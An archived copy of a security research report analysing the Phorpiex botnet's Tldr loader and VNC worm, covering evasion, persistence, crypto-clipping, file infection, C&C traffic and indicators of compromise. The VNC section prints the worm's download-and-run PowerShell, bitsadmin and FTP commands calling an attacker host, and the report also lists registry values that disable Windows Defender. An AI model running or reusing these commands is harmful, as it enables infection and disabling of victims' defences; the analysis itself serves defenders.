{
	"id": "a412c7d0-1694-40ee-967f-4d5b91cbeae7",
	"created_at": "2026-04-06T01:30:40.458504Z",
	"updated_at": "2026-04-10T13:12:19.319405Z",
	"deleted_at": null,
	"sha1_hash": "9773519a92d2dac0491f505f37e9b238405118b9",
	"title": "Phorpiex Arsenal: Part I",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 113245,
	"plain_text": "Phorpiex Arsenal: Part I\r\nBy etal\r\nPublished: 2020-01-27 · Archived: 2026-04-06 00:49:22 UTC\r\nThe Phorpiex botnet currently consists of more than 1,000,000 infected Windows computers. In our previous publications,\r\nwe wrote about the botnet architecture, its command and control infrastructure, and monetization methods:\r\nPhorpiex Breakdown\r\nIn the Footsteps of a Sextortion Campaign\r\nIn this article, we outline the technical details for implementing this botnet’s malicious modules.\r\nThe core part of the Phorpiex botnet is a loader named Tldr. It is responsible for loading additional malicious modules and\r\nother malware to the infected computers. Each module is a separate Windows executable. Usually, Phorpiex modules are\r\nvery small and simple. The malware configuration, that usually includes addresses of the C\u0026C servers, crypto-currency\r\nwallets, and URLs to download malicious payloads, is hardcoded to the malware executables. If it’s necessary to update the\r\nconfiguration, the botnet operators just load a new module to the infected machines. In addition, the modules are updated\r\nfrequently with minor changes. During 2019, we observed the following types of modules:\r\nLoader Phorpiex Tldr.\r\nVNC Worm Module.\r\nNetBIOS Worm Module.\r\nXMRig Silent Miner.\r\nSpam Module: Self-spreading and Sextortion\r\nAuxiliary modules (tiny geo-targeted loaders, and clean-up modules).\r\nWe should emphasize that 3 of these modules (Tldr, VNC Worm, and NetBIOS Worm) have functionality that allow the\r\nmalware to spread itself. For example, Tldr has the functionality of a file-infecting virus and is able to infect other files;\r\nVNC Worm connects to VNC servers with weak passwords and tries to infect them by simulating user input. This explains\r\nwhy this botnet has such a high prevalence.\r\nIn this report, we describe two of the Phorpiex modules in detail:\r\nLoader Phorpiex Tldr.\r\nVNC Worm Module.\r\nPhorpiex Tldr\r\nTldr (probably stands for “TrikLoader”) is one of the key parts in the Phorpiex botnet infrastructure.\r\n                                                                   Figure 1 – Phorpiex Tldr PDB filename\r\nWhen we first discovered this malware, we could not identify it or understand its affiliation with the botnet. However, its\r\nbinary code, mutex names, and sandbox evasion techniques are evidence that this malware was developed by the same\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 1 of 17\n\ngroup of cybercriminals as those behind the Phorpiex Trik IRC bot. Also, we found several intersections between the Trik\r\nand Tldr C\u0026C servers.\r\nWe noticed a large number of Phorpiex Tldr versions, each with different functionality. Our focus is on features they have in\r\ncommon, paying special attention to new functions added in the latest version (from July 2019). As stated previously, the\r\nmain purpose of Tldr malware is to download and execute other modules and malware to infected computers. However, this\r\nis not the only functionality. Tldr is also capable of self-spreading, as it can behave like a worm or a file-infecting virus and\r\ninfect other software.\r\nFigure 2 – Phorpiex Tldr timeline\r\nEvasion techniques\r\nPhorpiex Tldr uses simple sandbox evasion techniques. When started, it calls the GetModuleHandle () API function to check\r\nif one of the following modules is loaded in its process:\r\nSBIEDLL.DLL\r\nSBIEDLLX.DLL\r\nWPESPY.DLL\r\nDIR_WATCH.DLL\r\nAPI_LOG.DLL\r\nDIR_WATCH.DLL\r\nPSTOREC.DLL\r\nThen, it enumerates the running processes and checks if the process filename is one of the following:\r\nVBOXSERVICE.EXE\r\nVBOXTRAY.EXE\r\nVMTOOLSD.EXE\r\nVMWARETRAY.EXE\r\nVMWAREUSER\r\nVMSRVC.EXE\r\nVMUSRVC.EXE\r\nPRL_TOOLS.EXE\r\nXENSERVICE.EXE\r\nAn older version of Tldr (TldrV3, May 2018), also checks these processes:Then, it enumerates the running processes and\r\nchecks if the process filename is one of the following:\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 2 of 17\n\npython.exe\r\npythonw.exe\r\nprl_cc.exe\r\nvboxservice.exe\r\nvboxcontrol.exe\r\ntpautoconnsvc.exe\r\nFinally, Tldr calls the IsDebuggerPresent()  API function to check if the malware is being debugged.\r\nIf at least one check doesn’t pass, Tldr stops execution.\r\nInitialization\r\nThe initialization step is very similar to the one for the Phorpiex Trik.\r\nTo prevent running multiple instances of Phorpiex Tldr, it creates a mutex with a specific hardcoded name. Older versions\r\nused the mutex name containing the version number, for example, “TldrV3”. In the latest version, the mutex name is\r\ndifferent for each campaign. Usually it consists of several digits, for example: “6486894”.\r\n                                      Figure 3 – Mutex names used by different versions of Tldr.\r\nThe next step is the same for all Phorpiex samples:  deleting the “:Zone.Identifier” alternative data stream. This is performed\r\nto remove the trace that the origin of the file is an untrusted source.\r\nIn addition, the version from July 2019 (Tldr v5.0) acquires Debug privilege:\r\nFigure 4 – Tldr acquiring debug privilege in the version from July 2019\r\nPersistence\r\nTldr copies itself to the following folders:\r\n%windir%\r\n%userprofile%\r\n%systemdrive% (only version from July 2019)\r\n%temp%\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 3 of 17\n\nFor the Phorpiex Tldr V3, choosing the path and the filename is almost identical to the procedures used by Phorpiex Trik.\r\nTldr creates a subfolder with a hardcoded name that starts with “T-“ (in Phorpiex Trik, names started with “M-“) under\r\nthese paths. Then the malware copies its executable to the created folder under a hard-coded filename. For example:\r\nC:\\WINDOWS\\T-9759504507674060850740\\winsvc.exe\r\nUnlike Phorpiex Tldr v3, the newer version sets up persistence only if its filename doesn’t contain the “sys” substring. Then,\r\nit uses a sub-folder name generated from random digits and a filename that starts with “sys” followed by 4 random letters:\r\nFigure 5 – Generating the filename for setting up persistence\r\nTherefore, a new filename looks like this:\r\nC:\\WINDOWS\\2813528135\\sysjekp.exe\r\nPhorpiex Tldr sets the attributes FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN,\r\nFILE_ATTRIBUTE_SYSTEM for both the created file and subfolder.\r\nThen, the malware sets up registry autorun entries for each created copy under the following keys:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nTldr creates a new registry value with a hardcoded name. In the researched sample, this name is “Windows Operating\r\nSystem”:\r\nFigure 6 – Phorpiex Tldr autorun registry value\r\nIn addition, it adds a firewall exception by creating a new value under the registry key:\r\nSYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\L\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 4 of 17\n\nFigure 7 – Phorpiex Tldr firewall exception\r\nBypassing Windows Security\r\nThe version of Phorpiex Tldr from July 2019 (Tldr v5) disables Windows security features such as Windows Defender,\r\nSecurity notifications and System Restore by setting the following registry values:\r\nKey Value\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender “DisableAntiSpyware”= 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time\r\nProtection\r\n“DisableBehaviorMonitoring” =  1\r\n“DisableOnAccessProtection” =  1\r\n“DisableScanOnRealtimeEnable” =\r\n1\r\nHKLM\\SOFTWARE\\Microsoft\\Security Center\r\nHKLM\\SOFTWARE\\Microsoft\\Security Center\\Svc\r\n“AntiVirusOverride” = 1\r\n“UpdatesOverride” = 1\r\n“FirewallOverride” = 1\r\n“AntiVirusDisableNotify” = 1\r\n“UpdatesDisableNotify” = 1\r\n“AutoUpdateDisableNotify” = 1\r\n“FirewallDisableNotify” = 1\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\SystemRestore\r\n“DisableSR” = 1\r\nTable 1 – Registry values modified by Tldr v5.\r\nOlder versions of Tldr disable AntiSpyware only.\r\nMain functionality\r\nFor each malicious activity, Phorpiex Tldr creates a separate thread.\r\nCrypto Clipper Thread\r\nAlmost all samples contain functionality for stealing crypto-currency. This is done by changing the address of a crypto-currency wallet in the clipboard of an infected system.\r\nIn the infinite loop, every 200 milliseconds, the malware queries the clipboard data by calling the API functions\r\nOpenClipboard(0) and GetClipboardData(CF_TEXT).\r\nTo determine if the clipboard contains a crypto-wallet address, Phorpiex Tldr performs several checks:\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 5 of 17\n\nThe first character is one of these: 1, 3, q, 2, X, D, 0, L, 4, P, t, z, G, U, E;\r\nThe clipboard length is between 25 and 45 characters, or 9 letters, or between 90 and 115 letters.\r\nClipboard data should not contain letters: O (0x4F), I (0x49), l (0x6C)\r\nClipboard data should contain only digits and letters\r\nIf any of the checks fail, the clipboard remains unchanged. Otherwise, it determines the type of a crypto-currency wallet\r\naddress and changes it to one of the hardcoded values. Phorpiex Tldr determines the exact type of blockchain by the first\r\ncharacter of the clipboard data:\r\nFigure 8 – Crypto-currency wallets used by Phorpiex.\r\nThe following crypto-currencies are supported by Phorpiex:\r\nBitcoin\r\nBitcoin Cash\r\nEthereum\r\nDASH\r\nDogecoin\r\nLitecoin\r\nMonero\r\nZcash\r\nCrypto Clipper also handles Perfect Money wallets (Gold, USD, EUR):\r\nFigure 9 – Perfect Money wallets used by Phorpiex.\r\nFinally, the new data is sent back to the clipboard by calling SetClipboardData(CF_TEXT, new_value).\r\nSelf-spreading Thread\r\nIn this thread, the functionality of a file-worm is implemented.\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 6 of 17\n\nIn an infinite loop with a delay of 2 seconds, Tldr enumerates the available drives using GetLogicalDrives. It reads the\r\n“Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer” registry key value “NoDrives” and excludes the\r\ndrives disabled by the NoDrives Windows Explorer policy from enumeration.\r\nThen, Tldr selects only removable and remote drives. On each selected drive, it creates a folder with the name “__” and sets\r\nthe attributes FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN, and FILE_ATRRIBUTE_SYSTEM\r\nto the created folder to make it invisible in Explorer by default.\r\nThe malware copies itself to this folder under the hardcoded name (“DriveMgr.exe” in our sample). Tldr acquires the\r\nvolume name of the selected drive. Then it creates a shortcut with the name “{volume_name}.lnk” in the root folder of the\r\nselected drive with the target:\r\n%windir%\\system32\\cmd.exe /c start __ \u0026 __\\DriveMgr.exe \u0026 exit\r\nThen Tldr moves all folders from the root path of the selected drive to the folder “__”. It also deletes all files in the root path\r\nwith the following extensions:\r\n*.lnk, *.vbs, *.bat, *.js, *.scr, *.com, *.jse, *.cmd,*.pif, *.jar, *.dll, *.vbe, *.inf”\r\nFigure 10 – Extensions of files deleted by Tldr on removable drives.\r\nThe reason for this may be to disable all other worms that reside on the same removable drive.\r\nAs we can see, the behavior is the same as for other worms that use removable drives for spreading.\r\nHowever, in Tldr v5.0, a new functionality was introduced that allows the malware to function as a file-infecting virus and\r\ninfect other executables. Earlier, Phorpiex used a separate module to infect other software.\r\nThe malware scans all folders on removable and remote drives and infects all .exe files that are still not infected.\r\nTo infect another PE file, Tldr performs the following modifications: It increments the number of sections in the PE file\r\nheader, and sets the TimeDateStamp value of the header to the value 0x0000DEAD:\r\nFigure 11 – Timestamp signature used by Tldr to mark the infected files\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 7 of 17\n\nThe value 0x0000DEAD in the TimeDateStamp is also used by the malware to detect if the file is already infected. The\r\nvalue 0x0000DEAD transforms into the timestamp 1970-01-01 15:50:05. Therefore, infected samples can be easily found\r\non VirusTotal using this query:\r\npets:1970-01-01T15:50:05\r\nTldr also creates a new code section with the name “.zero” and copies the malicious payload there.  The Entry Point address\r\nis modified to point to the beginning of the created section. The SizeOfImage value of the header is increased by the length\r\nof the added section. The malware doesn’t recalculate checksum; it is just reset to 0.\r\nFigure 12 – Comparison of original and infected files\r\nTo create an adapter for calling the original entry point, the malware writes its relative address in the code of the main\r\ninjected function:\r\nFigure 13 – Comparison of the same function in the template and infected sample\r\nTldr uses the value 0xCCCCCCCC to find the location in the template function, where the original entry point address\r\nshould be placed:\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 8 of 17\n\nFigure 14 – Setting the address of entry point in an infected sample\r\nMalicious Shellcode\r\nThe shellcode inserted into infected files consists of several functions with position-independent code. This means that\r\nfunctions don’t use absolute addresses and are able to function correctly when placed in any memory location.\r\nFirst, the shellcode checks if the file “%appdata%\\winsvcs.txt” exists. This file is created by the Phorpiex Tldr. If the file\r\nexists, the shellcode doesn’t perform any action and just passes control to the original Entry Point of the infection program.\r\nOtherwise, it downloads and executes another file from a hard-coded URL:\r\nFigure 15 – Part of the shellcode in infected sample.\r\nThe file is downloaded to the temp file using the API function URLDownloadToFileW. The name for the temp file is\r\nobtained using the functions GetTempPathW and GetTempFileNameW. If the file was successfully downloaded, the\r\nshellcode deletes “:Zone.Identifier” ADS from this file and executes the file using CreateProcessW.\r\nFinally, the control is passed to the original entry point of the infected program.\r\nC\u0026C Check-in Threads\r\nWhen first run, Phorpiex Tldr performs check-in HTTP requests to its C\u0026C servers, using a hardcoded list of C\u0026C servers:\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 9 of 17\n\nFigure 16 – Hardcoded URLs of Phorpiex C\u0026C servers.\r\nTldr creates a thread for each C\u0026C server. Before starting the threads, the malware creates an empty file\r\n“%appdata%\\winsvcs.txt”. This file is used as a flag to determine if the malware is running for the first time. If this file\r\nalready exists, the threads are not created.\r\nIn each thread, the malware queries the following URL:\r\nhttp://\u003ccnc_host\u003e/t.php?new=1\r\nWe have also seen URLs of different formats in other samples. For example:\r\nhttp://\u003ccnc_host\u003e/tldr.php?new=1\r\nhttp://\u003ccnc_host\u003e/tldr.php?on=1\r\nhttp://\u003ccnc_host\u003e/tldr.php?new=1\u0026id=\u003crandom_number\u003e\r\nhttp://\u003ccnc_host\u003e/tldr.php?new=1\u0026on=\u003crandom_number\u003e\r\nTo perform check-in requests, Phorpiex Tldr uses a specific hard-coded value for User-agent header. The value for the\r\nversion from July 2019 is:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nThe value for older versions:\r\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nTherefore, the resulting HTTP request looks like the following:\r\nFigure 17 – Phorpiex C\u0026C check-in request.\r\nThe C\u0026C check-in functionality is not mandatory and not present in all samples.\r\nMain thread\r\nThe main purpose of Phorpiex Tldr is to download and execute additional malicious payloads on infected hosts. It uses\r\nseveral hardcoded paths (usually from 4 to 8) to create URLs for downloading files:\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 10 of 17\n\nFigure 18 – Hardcoded paths accessed at the C\u0026C server by Phorpiex Tldr.\r\nThe resulting URLs looks like this:\r\nhttp://\u003ccnc_domain\u003e/1.exe\r\nhttp://\u003ccnc_ domain\u003e/2.exe\r\n…\r\nFor each generated URL, the malware first checks its availability and content size by using the API functions\r\nInternetOpenUrlA and  HttpQueryInfoA. If the URL is available, Tldr remembers the content size for each path. If the\r\ncontent size is the same as the previous value, the URL is skipped, thus preventing re-downloading the same payload.\r\nIf the URL is available and requested for the first time, or the content length differs from the previous value, Tldr downloads\r\nand executes it. The downloaded file is saved in the %temp% folder under the name:\r\n“%d.exe” % random.randint(10000, 40000)\r\nFor example:\r\n%temp%\\23874.exe\r\nTldr performs 2 attempts to download a file: using InternetOpenUrlW/InternetReadFile, and using\r\nURLDownloadToFileW if the previous attempt failed.\r\nAfter downloading the file, Phorpiex Tldr deletes its alternative data stream “:Zone.Identifier”. Then it performs 2 attempts\r\nto execute the downloaded file: using CreateProcess, and ShellExecute if the previous attempt failed.\r\nThe actions above are performed in an infinite loop with a random delay from 1 to 600 seconds between cycles.\r\nIt’s interesting to note that such an implementation of the loader is very unsafe; anyone who registers domains which are\r\nhardcoded in older versions of Phorpiex Tldr can upload and execute any software on infected hosts. However, the latest\r\nTldr version (v5) received a significant improvement which makes such a scenario impossible.\r\nThe new feature uses file encryption with RC4 and RSA-SHA1 signature verification. The digital signature allows the\r\nmalware to verify both the integrity and authenticity of downloaded samples.\r\nThe encrypted file has a header which contains the magic bytes (“NGS!”), the length of the RSA signature, and the RSA\r\nsignature that is used for verifying the file. The first 16 bytes of the RSA signature are used as the RC4 decryption key:\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 11 of 17\n\nFigure 19 – Format of the encrypted file downloaded from the Phorpiex C\u0026C server.\r\nPhorpiex Tldr decrypts the data using the 16-bytes RC4 key from the file, and then calculates the SHA1 hash of the\r\ndecrypted file.  To verify the digital signature, Tldr uses the 4096-bit RSA public key hardcoded into the sample.\r\nFigure 20 – Hardcoded RSA public key.\r\nIf the signature verification fails, the file is not executed. This means that only files signed with the corresponding RSA\r\nprivate key can be accepted by the Phorpiex Tldr.\r\nPhorpiex VNC Worm Module\r\nOne of the modules we discovered in the Phorpiex arsenal is a malicious VNC client. It doesn’t have its own persistence\r\nmechanism and is normally executed by Tldr each time. This tiny malware scans random IP addresses for an open VNC\r\nserver port (5900) and runs a brute-force attack using a hard-coded list of passwords. The final goal of that attack is to load\r\nand execute another malware (usually Phorpiex Tldr) on the target host.\r\nThe execution of the Phorpiex VNC Worm starts with an API bombing sandbox evasion technique. It performs a large\r\nnumber of meaningless calls to several functions in a loop:\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 12 of 17\n\nFigure 21 – API bombing evasion technique.\r\nThe malware prevents multiple executions in several instances by using a mutex with a hardcoded name:\r\nThe attack itself is performed in an infinite loop. The IP addresses used for scanning are generated randomly using the rand()\r\nfunction and the GetTickCount() results as a random seed. The only filter rule for an IP address is that it cannot start with\r\n127, 172 or 192. A separate thread is created to communicate with each IP address.\r\nIf the attempt to connect to the TCP port 5900 was successful, the VNC worm starts a brute-force attack of the discovered\r\nVNC server with a list of passwords:\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 13 of 17\n\nFigure 22 – List of passwords used for the VNC brute-force attack.\r\nThe list of passwords may vary among different samples.\r\nIf the attack is successful, the results can be reported to a C\u0026C server using the URL of the following format (the URL\r\ntemplate is hardcoded in the malware sample):\r\n hxxp://92.63.197.153/result.php?vnc=%s|%s” % (host, password)\r\n In the researched samples the reporting functionality is disabled even though the URL is present.\r\nFinally, the Phorpiex VNC worm executes several scripts on a victim’s machine by simulating keyboard input using VNC\r\nprotocol. First it enters Win+R to open the “Run program” window. Then it “enters” the script contents by sending the\r\ncorresponding VNC packets:\r\nFigure 23 – Illustration of the attack: simulated user input using VNC commands.\r\nThe following scripts are usually executed:\r\ncmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object\r\nSystem.Net.WebClient).DownloadFile(‘http://92.63.197.153/vnc.exe’,’%temp%\\48303045850.exe’);Start-Process\r\n‘%temp%\\48303045850.exe’\r\ncmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/vnc.exe\r\n%temp%\\49405003030.exe\u0026start %temp%\\49405003030.exe\r\ncmd.exe /c netsh firewall add allowedprogram C:\\Windows\\System32\\ftp.exe “ok” ENABLE\u0026netsh advfirewall\r\nfirewall add rule name=”ok” dir=in action=allow program=”C:\\Windows\\System32\\ftp.exe” enable=yes\r\ncmd.exe /c “cd %temp%\u0026@echo open 92.63.197.153\u003e\u003eftpget.txt\u0026@echo tom\u003e\u003eftpget.txt\u0026@echo\r\nhehehe\u003e\u003eftpget.txt\u0026@echo binary\u003e\u003eftpget.txt\u0026@echo get vnc.exe\u003e\u003eftpget.txt\u0026@echo quit\u003e\u003eftpget.txt\u0026@ftp -\r\ns:ftpget.txt\u0026@start vnc.exe”\r\nThis way, the Phorpiex VNC worm forces the victim’s machine to download and execute a malicious sample through HTTP\r\nor FTP from the server which is controlled by the malware actors.  As we can see from the script source, the malware uses\r\nhardcoded credentials to access the FTP server:\r\nUSER tom\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 14 of 17\n\nPASS hehehe\r\nWe observed the following locations that were used for the victims to download payloads:\r\nftp://tom:hehehe@92.63.197[.]153/vnc.exe\r\nftp://tom:hehehe@92.63.197[.]153/ohuh.exe\r\nhttp://92.63.197[.]153/vnc.exe\r\nhttp://92.63.197[.]153/ohuh.exe\r\nThis module was generally used by Phorpiex botnet for self-spreading and pushing ransomware.\r\nIOC\r\nPhorpiex Tldr\r\nMD5 Compilation Timestamp Version\r\n383498f810f0a992b964c19fc21ca398 May 28 12:51:34 2018 Tldr v1.0\r\n11ced3ab21afbeff6ce70d1f4b6e5fc7 Jun 14 00:31:27 2018 Tldr v2.0\r\n8e12c260a0cdc4e25a39ec026214bf99 Oct 25 00:08:30 2018 Tldr v3.0\r\n51d0c623f263260bd52f9ebeb00dae00 Jul 09 13:56:40 2019 Tldr v4\r\n3282f6c806a89359ec94f287cf6c699c Jul 18 01:08:07 2019 Tldr v5\r\nPhorpiex Tldr C\u0026C IPs and domains:\r\nDomain or IP\r\n185.176.27.132\r\n193.32.161.69\r\n193.32.161.73\r\n193.32.161.77\r\n92.63.197.153\r\n92.63.197.38\r\n92.63.197.59\r\n92.63.197.60\r\n94.156.133.65\r\naiiaiafrzrueuedur.ru\r\nfafhoafouehfuh.su\r\nffoeefsheuesihfo.ru\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 15 of 17\n\nosheoufhusheoghuesd.ru\r\nouhfuosuoosrhzfzr.ru\r\nslpsrgpsrhojifdij.ru\r\nunokaoeojoejfghr.ru\r\nb0t.to\r\nthaus.to\r\nthaus.top\r\nURLs related to Phorpiex Tldr:\r\nhxxp://185.176.27[.]132/a.exe\r\nhxxp://aiiaiafrzrueuedur.ru/o.exe\r\nhxxp://185.176.27[.]132/1\r\nhxxp://185.176.27[.]132/2\r\nhxxp://185.176.27[.]132/3\r\nhxxp://185.176.27[.]132/4\r\nhxxp://185.176.27[.]132/5\r\nhxxp://185.176.27[.]132/6\r\nhxxp://185.176.27[.]132/7\r\nhxxp://193.32.161[.]69/1.exe\r\nhxxp://193.32.161[.]69/2.exe\r\nhxxp://193.32.161[.]69/3.exe\r\nhxxp://193.32.161[.]69/4.exe\r\nhxxp://193.32.161[.]69/5.exe\r\nhxxp://193.32.161[.]69/6.exe\r\nhxxp://193.32.161[.]69/7.exe\r\nhxxp://193.32.161[.]69/ya.exe\r\nhxxp://193.32.161[.]73/1\r\nhxxp://193.32.161[.]73/2\r\nhxxp://193.32.161[.]73/3\r\nhxxp://193.32.161[.]73/4\r\nhxxp://193.32.161[.]73/5\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 16 of 17\n\nhxxp://193.32.161[.]73/6\r\nhxxp://193.32.161[.]73/s.exe\r\nhxxp://193.32.161[.]77/11.exe\r\nPhorpiex VNC Worm\r\nMD5 Downloaded From\r\n28436a88ee38c5f3b50ffe6ae250b358 hxxp://92.63.197.38/4.exe\r\n262148aee0263d710fad294da40f00fc hxxp://92.63.197.60/5.exe\r\n33da71f4068bb396ecd1010132abad00 hxxp://92.63.197.153/4.exe\r\n6fad1536ab4a9ab46d054ad76996b2d6 hxxp://92.63.197.153/3.exe\r\nCheck Point Anti-Bot blade provides protection against this threat:\r\nWorm.Win32.Phorpiex.C\r\nWorm.Win32.Phorpiex.D\r\nWorm.Win32.Phorpiex.H\r\nSource: https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nhttps://research.checkpoint.com/2020/phorpiex-arsenal-part-i/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/"
	],
	"report_names": [
		"phorpiex-arsenal-part-i"
	],
	"threat_actors": [],
	"ts_created_at": 1775439040,
	"ts_updated_at": 1775826739,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9773519a92d2dac0491f505f37e9b238405118b9.pdf",
		"text": "https://archive.orkl.eu/9773519a92d2dac0491f505f37e9b238405118b9.txt",
		"img": "https://archive.orkl.eu/9773519a92d2dac0491f505f37e9b238405118b9.jpg"
	}
}